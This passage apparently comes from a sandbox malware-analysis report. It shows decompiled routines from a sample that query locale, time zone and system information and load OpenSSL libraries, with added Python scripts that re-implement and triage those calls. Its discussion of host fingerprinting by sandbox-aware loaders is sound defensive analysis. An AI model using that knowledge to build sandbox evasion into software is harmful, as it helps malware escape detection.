				E00404C30( &_v16, 7,  &_v11); // copy the buffer into a managed string
				_push(_v16);
				E00409664(7, GetACP(), _t33); // GetACP() is passed alongside the string, presumably as the fallback code page
                                                    				_pop(_t28);
                                                    				 *[fs:eax] = _t28;
                                                    				_push(E0040E0F3);
                                                    				return E004049C0( &_v16);
                                                    			}

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0AE
                                                    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040E0EC), ref: 0040E0C7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                    • Instruction ID: 7c6682d932fdf235f30c9e422d46d0a378ce0b1a8e98ecff7cc19f77d6cd180e
                                                    • Opcode Fuzzy Hash: a1f457d7b3ffcdaaeee38bedc2788677392b62057e0918eed350879aa8eb83f3
                                                    • Instruction Fuzzy Hash: DCF0F671E08308ABEB00EBB2C85298EB3AEE7C4714F50C97AB110A36C1DA7C65018659
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E0047E020(signed int __ebx, void* __ecx, void* __esi, long long __fp0) {
                                                    				long long _v12;
                                                    				struct _TIME_ZONE_INFORMATION _v184;
                                                    				char _v188;
                                                    				char _v192;
                                                    				void* _t29;
                                                    				intOrPtr _t30;
                                                    				void* _t48;
                                                    				void* _t49;
                                                    				intOrPtr _t51;
                                                    				signed int _t55;
                                                    				signed int _t66;
                                                    				void* _t70;
                                                    				intOrPtr _t71;
                                                    				void* _t78;
                                                    				long long _t86;
                                                    
                                                    				_t86 = __fp0;
                                                    				_t55 = __ebx;
                                                    				_push(__ebx);
                                                    				_v192 = 0;
                                                    				_v188 = 0;
                                                    				_push(_t78);
                                                    				_push(0x47e133);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t78 + 0xffffff44;
				_t29 = GetTimeZoneInformation( &_v184) - 0xffffffff; // result + 1, so 0 here means TIME_ZONE_ID_INVALID (-1)
				if(_t29 == 0) {
					_t30 =  *0x49dde0; // 0x47a56c
					E00406A70(_t30,  &_v188);
					_t66 = 1;
					E0040D144(_v188, 1); // error path for TIME_ZONE_ID_INVALID
					E00404378();
				} else {
					_t48 = _t29 - 1;
					if(_t48 == 0) {
						_t55 = _v184.Bias; // TIME_ZONE_ID_UNKNOWN (0): Bias only
					} else {
						_t49 = _t48 - 1;
						if(_t49 == 0) {
							_t55 = _v184.Bias + _v184.StandardBias; // TIME_ZONE_ID_STANDARD (1)
						} else {
							_t83 = _t49 == 1;
							if(_t49 == 1) {
								_t55 = _v184.Bias + _v184.DaylightBias; // TIME_ZONE_ID_DAYLIGHT (2)
							} else {
								_t51 =  *0x49dde0; // 0x47a56c
								E00406A70(_t51,  &_v192);
								_t66 = 1;
								E0040D144(_v192, 1); // any other result value: same error path
								E00404378();
							}
						}
					}
				}
				_push(0);
				asm("cdq");
				_t60 = (_t55 ^ _t66) - _t66; // cdq / xor / sub idiom: abs(bias); _t66 stands in for the sign mask in edx
				asm("cdq");
				_push(((_t55 ^ _t66) - _t66) % 0x3c); // abs(bias) mod 60 -> minutes
				asm("cdq");
				asm("cdq");
				_pop(_t70);
				E0040AF70(_t60 / 0x3c, 0, _t70, _t83, _t86); // abs(bias) div 60 -> hours; combines hours and minutes into the floating-point result in _t86
				_v12 = _t86;
				asm("wait");
				if(_t55 > 0) {
					_v12 =  *0x47e144 - _v12; // bias > 0 (west of UTC): constant at 0x47e144 minus the result, i.e. a sign flip
					asm("wait");
				}
                                                    				_pop(_t71);
                                                    				 *[fs:eax] = _t71;
                                                    				_push(0x47e13a);
                                                    				return E004049E4( &_v192, 2);
                                                    			}
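The arithmetic at the end of E0047E020 is hard to follow through the cdq/xor/sub and the two div/mod-by-0x3c operations. The Python below is an added re-implementation of that logic as read from the decompilation above; it is not code from the sample or from the Joe Sandbox report. It assumes the documented Windows TIME_ZONE_ID_* values (INVALID = -1, UNKNOWN = 0, STANDARD = 1, DAYLIGHT = 2) and a Delphi-style TDateTime day-fraction encoding for the result (milliseconds / 86,400,000); the function, class and field names are mine, and the sample inputs are constructed, not captured from the sandbox run.

```python
# Added example: Python port of the offset computation in E0047E020 (my names,
# not the sample's). Assumes Windows TIME_ZONE_ID_* values and a TDateTime-style
# day-fraction result.
from dataclasses import dataclass

TIME_ZONE_ID_INVALID = 0xFFFFFFFF  # appears as -1 in the decompilation
TIME_ZONE_ID_UNKNOWN = 0
TIME_ZONE_ID_STANDARD = 1
TIME_ZONE_ID_DAYLIGHT = 2

MSECS_PER_DAY = 24 * 60 * 60 * 1000


@dataclass
class TimeZoneInformation:
    """The three TIME_ZONE_INFORMATION fields the function reads (all in minutes)."""
    bias: int
    standard_bias: int = 0
    daylight_bias: int = 0


def abs_cdq(value: int) -> int:
    """abs() exactly as the cdq / xor / sub sequence computes it on a 32-bit int."""
    value &= 0xFFFFFFFF
    sign = 0xFFFFFFFF if value & 0x80000000 else 0   # edx after cdq
    return ((value ^ sign) - sign) & 0xFFFFFFFF      # (eax ^ edx) - edx


def encode_time(hours: int, minutes: int, seconds: int = 0, msecs: int = 0) -> float:
    """Day fraction in the style of Delphi's EncodeTime (0.5 == 12:00:00)."""
    if not (0 <= hours < 24 and 0 <= minutes < 60 and 0 <= seconds < 60 and 0 <= msecs < 1000):
        raise ValueError("invalid time components")
    total_msecs = ((hours * 60 + minutes) * 60 + seconds) * 1000 + msecs
    return total_msecs / MSECS_PER_DAY


def effective_bias(tz_id: int, tzi: TimeZoneInformation) -> int:
    """Mirror of the result+1 switch in the decompilation: choose which bias applies."""
    if tz_id == TIME_ZONE_ID_INVALID:
        raise OSError("GetTimeZoneInformation failed (TIME_ZONE_ID_INVALID)")
    if tz_id == TIME_ZONE_ID_UNKNOWN:
        return tzi.bias
    if tz_id == TIME_ZONE_ID_STANDARD:
        return tzi.bias + tzi.standard_bias
    if tz_id == TIME_ZONE_ID_DAYLIGHT:
        return tzi.bias + tzi.daylight_bias
    raise OSError(f"unexpected GetTimeZoneInformation result {tz_id}")


def utc_offset_days(tz_id: int, tzi: TimeZoneInformation) -> float:
    """Signed local-minus-UTC offset as a day fraction, following E0047E020.

    Windows biases are UTC minus local (positive west of UTC). The function takes
    abs(bias), splits it into hours and minutes, encodes that as a time of day and
    then negates the result when the bias was positive, so the sign comes out as
    local minus UTC.
    """
    bias = effective_bias(tz_id, tzi)
    magnitude = abs_cdq(bias)
    hours, minutes = divmod(magnitude, 60)   # the div/mod-by-0x3c pair
    result = encode_time(hours, minutes, 0, 0)
    if bias > 0:
        result = 0.0 - result                # the `if(_t55 > 0)` branch
    return result


if __name__ == "__main__":
    # Constructed inputs (US Eastern and India), not values captured from the sandbox run.
    eastern = TimeZoneInformation(bias=300, standard_bias=0, daylight_bias=-60)
    india = TimeZoneInformation(bias=-330)
    print(utc_offset_days(TIME_ZONE_ID_STANDARD, eastern))  # -0.20833... == -5/24 (UTC-5)
    print(utc_offset_days(TIME_ZONE_ID_DAYLIGHT, eastern))  # -0.16666... == -4/24 (UTC-4)
    print(utc_offset_days(TIME_ZONE_ID_UNKNOWN, india))     # 0.22916... == 330/1440 (UTC+5:30)
```

Running it shows the two things the decompilation obscures: the bias is folded into hours and minutes before encoding (so 330 minutes becomes 5:30, not 5.5 hours of raw arithmetic), and the sign convention is the opposite of the Windows Bias field. When interpreting a value of this shape elsewhere in the analysis, compare it against the sandbox host's configured time zone with that sign flip in mind.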
                                                    0x0047e132

                                                    APIs
                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,0047E133,?,?,?,?,0047DC8D,?,00000000,0047DCD5), ref: 0047E04E
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InformationLoadStringTimeZone
                                                    • String ID:
                                                    • API String ID: 2315373741-0
                                                    • Opcode ID: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                    • Instruction ID: c8d3901693a79c185cc961f03ab4e0d83d179c54252409d0c18e91a2dd9ec5b1
                                                    • Opcode Fuzzy Hash: ceb2891f7d61990538c6f2e2e1a46ec860deeff2fc2c3279e0f8b5fdeb1ddd5e
                                                    • Instruction Fuzzy Hash: 6A318670B043148BD714DF26DC81BA9B776EB48304F0482FAE50DE3291DB799D54CB1A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E0042F60C(intOrPtr __eax, intOrPtr* __edx) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _t12;
                                                    				intOrPtr _t21;
                                                    				intOrPtr _t22;
                                                    				intOrPtr _t25;
                                                    
                                                    				_v8 = __eax;
                                                    				_t22 =  *__edx;
                                                    				_t26 = _t22 - 0x113;
                                                    				if(_t22 != 0x113) {
                                                    					_push( *((intOrPtr*)(__edx + 8)));
                                                    					_push( *((intOrPtr*)(__edx + 4)));
                                                    					_push(_t22);
                                                    					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                                                    					_push(_t12);
                                                    					L00407540();
                                                    					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                                                    					return _t12;
                                                    				}
                                                    				_push(0x42f646);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t25;
                                                    				L00403DE8(_v8, _t26);
                                                    				_pop(_t21);
                                                    				 *[fs:eax] = _t21;
                                                    				return 0;
                                                    			}
                                                    0x0042f615
                                                    0x0042f618
                                                    0x0042f61a
                                                    0x0042f620
                                                    0x0042f664
                                                    0x0042f668
                                                    0x0042f669
                                                    0x0042f66d
                                                    0x0042f670
                                                    0x0042f671
                                                    0x0042f676
                                                    0x00000000
                                                    0x0042f676
                                                    0x0042f625
                                                    0x0042f62a
                                                    0x0042f62d
                                                    0x0042f637
                                                    0x0042f63e
                                                    0x0042f641
                                                    0x00000000

                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F671
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                    • Instruction ID: 80422fc4f260eb885d3d5276ce9bf4904eb24ae74d3e19530ef2a12f5b611188
                                                    • Opcode Fuzzy Hash: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                    • Instruction Fuzzy Hash: 1EF0F676B04214AFD700DF9AE881C96BBFCEB0D7203A140B7F908D7650D235AD009B74
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E00406AC6(int __eax, void* __ebx, void* __eflags) {
                                                    				char _v8;
                                                    				char _v15;
                                                    				char _v20;
                                                    				intOrPtr _t29;
                                                    				void* _t32;
                                                    
                                                    				_v20 = 0;
                                                    				_push(_t32);
                                                    				_push(0x406b2e);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t32 + 0xfffffff0;
                                                    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                    				E00404C30( &_v20, 7,  &_v15);
                                                    				E004035F0(_v20,  &_v8);
                                                    				if(_v8 != 0) {
                                                    				}
                                                    				_pop(_t29);
                                                    				 *[fs:eax] = _t29;
                                                    				_push(E00406B35);
                                                    				return E004049C0( &_v20);
                                                    			}
                                                    0x00406ad1
                                                    0x00406ad6
                                                    0x00406ad7
                                                    0x00406adc
                                                    0x00406adf
                                                    0x00406aee
                                                    0x00406afe
                                                    0x00406b09
                                                    0x00406b14
                                                    0x00406b14
                                                    0x00406b1a
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b2d

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                    • Instruction ID: 1884f1ac99702eb7bfb6ab039d2c511877b7776afc39d63850cc4166923a2af7
                                                    • Opcode Fuzzy Hash: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                    • Instruction Fuzzy Hash: 99F02870A04319AFE714DFA2CC42AAEB3BAF7C4310F40857AB510F31C4E7B82A10C684
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00426548(intOrPtr __eax, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v48;
                                                    				struct _SYSTEM_INFO* _t17;
                                                    				unsigned int _t20;
                                                    				unsigned int _t22;
                                                    				signed int _t31;
                                                    				intOrPtr _t33;
                                                    
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t17 =  &_v48;
                                                    				GetSystemInfo(_t17);
                                                    				_t33 = _v8;
                                                    				_t31 = _v12 - 1;
                                                    				if(_t31 >= 0) {
                                                    					if( *((short*)( &_v48 + 0x20)) == 3) {
                                                    						do {
                                                    							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                                                    							 *(_t33 + _t31 * 4) = _t20;
                                                    							_t31 = _t31 - 1;
                                                    						} while (_t31 >= 0);
                                                    						return _t20;
                                                    					} else {
                                                    						goto L2;
                                                    					}
                                                    					do {
                                                    						L2:
                                                    						asm("bswap eax");
                                                    						_t22 =  *(_t33 + _t31 * 4) >> 8;
                                                    						 *(_t33 + _t31 * 4) = _t22;
                                                    						_t31 = _t31 - 1;
                                                    					} while (_t31 >= 0);
                                                    					return _t22;
                                                    				}
                                                    				return _t17;
                                                    			}
                                                    0x0042654e
                                                    0x00426551
                                                    0x00426554
                                                    0x00426558
                                                    0x0042655d
                                                    0x00426563
                                                    0x00426564
                                                    0x0042656e
                                                    0x00426581
                                                    0x0042658a
                                                    0x00426592
                                                    0x00426595
                                                    0x00426595
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00426570
                                                    0x00426570
                                                    0x00426573
                                                    0x00426575
                                                    0x00426578
                                                    0x0042657b
                                                    0x0042657b
                                                    0x00000000
                                                    0x00426570
                                                    0x0042659c

                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?), ref: 00426558
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                    • Instruction ID: 24291676ee62f313b8705277a049495d892b78a3fb7c7c66d6bc96e5edecc5e6
                                                    • Opcode Fuzzy Hash: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                    • Instruction Fuzzy Hash: BDF096B1E01119AFCB11DF98E48489DB7B4FB5A301B95429AD408DB342EB34A6D5C7C9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E00406AC8(int __eax, void* __ebx, void* __eflags) {
                                                    				char _v8;
                                                    				char _v15;
                                                    				char _v20;
                                                    				intOrPtr _t29;
                                                    				void* _t32;
                                                    
                                                    				_v20 = 0;
                                                    				_push(_t32);
                                                    				_push(0x406b2e);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t32 + 0xfffffff0;
                                                    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                    				E00404C30( &_v20, 7,  &_v15);
                                                    				E004035F0(_v20,  &_v8);
                                                    				if(_v8 != 0) {
                                                    				}
                                                    				_pop(_t29);
                                                    				 *[fs:eax] = _t29;
                                                    				_push(E00406B35);
                                                    				return E004049C0( &_v20);
                                                    			}
                                                    0x00406ad1
                                                    0x00406ad6
                                                    0x00406ad7
                                                    0x00406adc
                                                    0x00406adf
                                                    0x00406aee
                                                    0x00406afe
                                                    0x00406b09
                                                    0x00406b14
                                                    0x00406b14
                                                    0x00406b1a
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b2d

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                    • Instruction ID: 8c46e58028a20f45c726cdf232f197f4d268d7d6409a4c5068237e5da40a84cb
                                                    • Opcode Fuzzy Hash: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                    • Instruction Fuzzy Hash: 80F0C871A04319AFE714DFA2CC42A9EB37AF7C4714F51857AA510B71D4E7B82610C684
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040C964(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                    				char _v260;
                                                    				int _t5;
                                                    				intOrPtr _t10;
                                                    				void* _t18;
                                                    
                                                    				_t18 = __ecx;
                                                    				_t10 = _a4;
                                                    				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
                                                    				_t19 = _t5;
                                                    				if(_t5 <= 0) {
                                                    					return E00404A14(_t10, _t18);
                                                    				}
                                                    				return E00404AB0(_t10, _t5 - 1,  &_v260, _t19);
                                                    			}
                                                    0x0040c96f
                                                    0x0040c971
                                                    0x0040c982
                                                    0x0040c987
                                                    0x0040c989
                                                    0x00000000
                                                    0x0040c9a1
                                                    0x00000000

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                    • Instruction ID: c55d8128e0464d7f0ffda61b66ea8af477aea0d032980e5ba508f3227b3018b3
                                                    • Opcode Fuzzy Hash: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                    • Instruction Fuzzy Hash: 07E092B271421457D314A6695C869EA725C9798310F00427FBA49E73C2EDB89D4446ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E0040C9B0(int __eax, char __ecx, int __edx) {
                                                    				char _v16;
                                                    				char _t5;
                                                    				char _t6;
                                                    
                                                    				_push(__ecx);
                                                    				_t6 = __ecx;
                                                    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                    					_t5 = _t6;
                                                    				} else {
                                                    					_t5 = _v16;
                                                    				}
                                                    				return _t5;
                                                    			}
                                                    0x0040c9b3
                                                    0x0040c9b4
                                                    0x0040c9ca
                                                    0x0040c9d1
                                                    0x0040c9cc
                                                    0x0040c9cc
                                                    0x0040c9cc
                                                    0x0040c9d7

                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040E39A,00000000,0040E5B3,?,?,00000000,00000000), ref: 0040C9C3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                    • Instruction ID: 274c397104c08bcef1503af243249226e7c8b6f68a7688c9cfeef2f5654669c9
                                                    • Opcode Fuzzy Hash: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                    • Instruction Fuzzy Hash: 98D05EA630E2546AE214525A2D85DBB5AACCAC57B1F10423FF988E7281D2248C0693BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
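The function listings above are what the report's "Contains functionality to query locales information (e.g. system language)" signature rests on: GetLocaleInfoA is called with LCType 0x1004 (LOCALE_IDEFAULTANSICODEPAGE, 7 bytes) at 00406AEE, with an unresolved LCType and a 0x100-byte buffer at 0040C982, and with LCType 0xF (LOCALE_STHOUSAND, 2 bytes) at 0040C9C3, next to GetTimeZoneInformation at 0047E04E and GetSystemInfo at 00426558. The following triage script is an added example written for this page, not Joe Sandbox tooling: it parses the "APIs" lines reproduced in the listing (the sample input is those lines copied from this section), decodes the LCType argument with the documented winnls.h constants, and groups the calls into the environment-fingerprinting categories a reviewer would want to see together. The category names and the API-to-category table are this example's own choice.

```python
"""Decode the 'APIs' lines of a Joe Sandbox function listing and group the
environment-fingerprinting calls.  Added example for this report; the
regular expression matches the listing format shown on this page and the
LCTYPE table is the documented winnls.h values."""
import json
import re
from collections import defaultdict

# Constructed input: the "APIs" bullets copied from the listings above.
SAMPLE_API_LINES = """\
• GetTimeZoneInformation.KERNEL32(?,00000000,0047E133,?,?,?,?,0047DC8D,?,00000000,0047DCD5), ref: 0047E04E
  • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F671
• GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
• GetSystemInfo.KERNEL32(?), ref: 00426558
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040E39A,00000000,0040E5B3,?,?,00000000,00000000), ref: 0040C9C3
"""

# One bullet: optional "Part of subcall function X:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDRESS".  Unresolved arguments print as "?".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Subset of the LCTYPE constants from winnls.h (documented Windows values).
LCTYPE_NAMES = {
    0x0001: "LOCALE_ILANGUAGE",
    0x0002: "LOCALE_SLANGUAGE",
    0x0006: "LOCALE_SCOUNTRY",
    0x000E: "LOCALE_SDECIMAL",
    0x000F: "LOCALE_STHOUSAND",
    0x001D: "LOCALE_SDATE",
    0x001E: "LOCALE_STIME",
    0x001F: "LOCALE_SSHORTDATE",
    0x0020: "LOCALE_SLONGDATE",
    0x1004: "LOCALE_IDEFAULTANSICODEPAGE",
}

# Category table chosen for this example (assumption, not a Joe Sandbox rule).
FINGERPRINT_APIS = {
    "GetLocaleInfoA": "locale", "GetLocaleInfoW": "locale",
    "GetTimeZoneInformation": "time_zone", "GetLocalTime": "time_zone",
    "GetSystemInfo": "hardware", "GetNativeSystemInfo": "hardware",
}


def parse_api_lines(text):
    """Return one dict per parsed bullet: api, module, args, ref, subcall_of."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def arg_value(args, index):
    """Integer value of a positional argument; None when absent or shown as '?'."""
    if index >= len(args) or args[index] == "?":
        return None
    return int(args[index], 16)


def decode_locale_query(call):
    """GetLocaleInfoA(Locale, LCType, lpLCData, cchData): name the LCType."""
    lctype = arg_value(call["args"], 1)
    if lctype is None:
        name = "unresolved"
    else:
        name = LCTYPE_NAMES.get(lctype, "LCTYPE_0x%04X" % lctype)
    return {"ref": call["ref"], "lctype": name, "cchData": arg_value(call["args"], 3)}


def triage(text):
    """Group fingerprinting calls by category and decode every locale query."""
    by_category = defaultdict(list)
    locale_queries = []
    for call in parse_api_lines(text):
        category = FINGERPRINT_APIS.get(call["api"])
        if category is None:
            continue  # DefWindowProc, LoadStringA etc. are not fingerprinting
        by_category[category].append((call["api"], call["ref"]))
        if call["api"].startswith("GetLocaleInfo"):
            locale_queries.append(decode_locale_query(call))
    return {"categories": dict(by_category), "locale_queries": locale_queries}


def fingerprint_categories(result):
    """Sorted list of the categories that have at least one call."""
    return sorted(c for c, calls in result["categories"].items() if calls)


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_API_LINES), indent=2))
```

Read the output with the listing in mind: the 2-byte query with a single-character fallback in E0040C9B0 and the 0x100-byte query in E0040C964 have the shape of a runtime library initialising its number and date format settings, so a locale signature on its own is weak evidence of targeting (an assessment, not a finding of the report). The combination that matters for triage is all three categories appearing together in the same module: time zone, locale and processor level (the wProcessorLevel == 3 check at offset 0x20 of SYSTEM_INFO in E00426548) give a fingerprint of the host that a sandbox-aware loader can compare against expectations.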

                                                    C-Code - Quality: 79%
                                                    			E0040B2D4(long long __fp0) {
                                                    				struct _SYSTEMTIME _v16;
                                                    				void* _t7;
                                                    				long long* _t10;
                                                    				void* _t11;
                                                    				long long _t12;
                                                    
                                                    				_t12 = __fp0;
                                                    				GetLocalTime( &_v16);
                                                    				_t7 = E0040B110(_v16.wYear, _v16.wDay, _v16.wMonth, _t11, __fp0);
                                                    				 *_t10 = _t12;
                                                    				asm("wait");
                                                    				return _t7;
                                                    			}
                                                    0x0040b2d4
                                                    0x0040b2dc
                                                    0x0040b2f0
                                                    0x0040b2f5
                                                    0x0040b2f8
                                                    0x0040b2ff

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID:
                                                    • API String ID: 481472006-0
                                                    • Opcode ID: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                    • Instruction ID: a3b185b344278dcf1c9439e42592f718bf33603f87ac91d23c0fcb87781d4dc0
                                                    • Opcode Fuzzy Hash: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                    • Instruction Fuzzy Hash: 71D09E28409505A1C2007B15C85549FB7A4EE84740F808D5DF4D856391EB358595C79B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004906B8() {
                                                    				void* __ebx;
                                                    				void* _t158;
                                                    
                                                    				_t158 = 1;
                                                    				if( *0x49d588 == 0) {
                                                    					 *0x49d588 = LoadLibraryA("libeay32.dll");
                                                    				}
                                                    				_t160 =  *0x49d584;
                                                    				if( *0x49d584 == 0) {
                                                    					 *0x49d584 = LoadLibraryA("ssleay32.dll");
                                                    					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
                                                    					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
                                                    					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
                                                    					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
                                                    					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
                                                    					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
                                                    					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
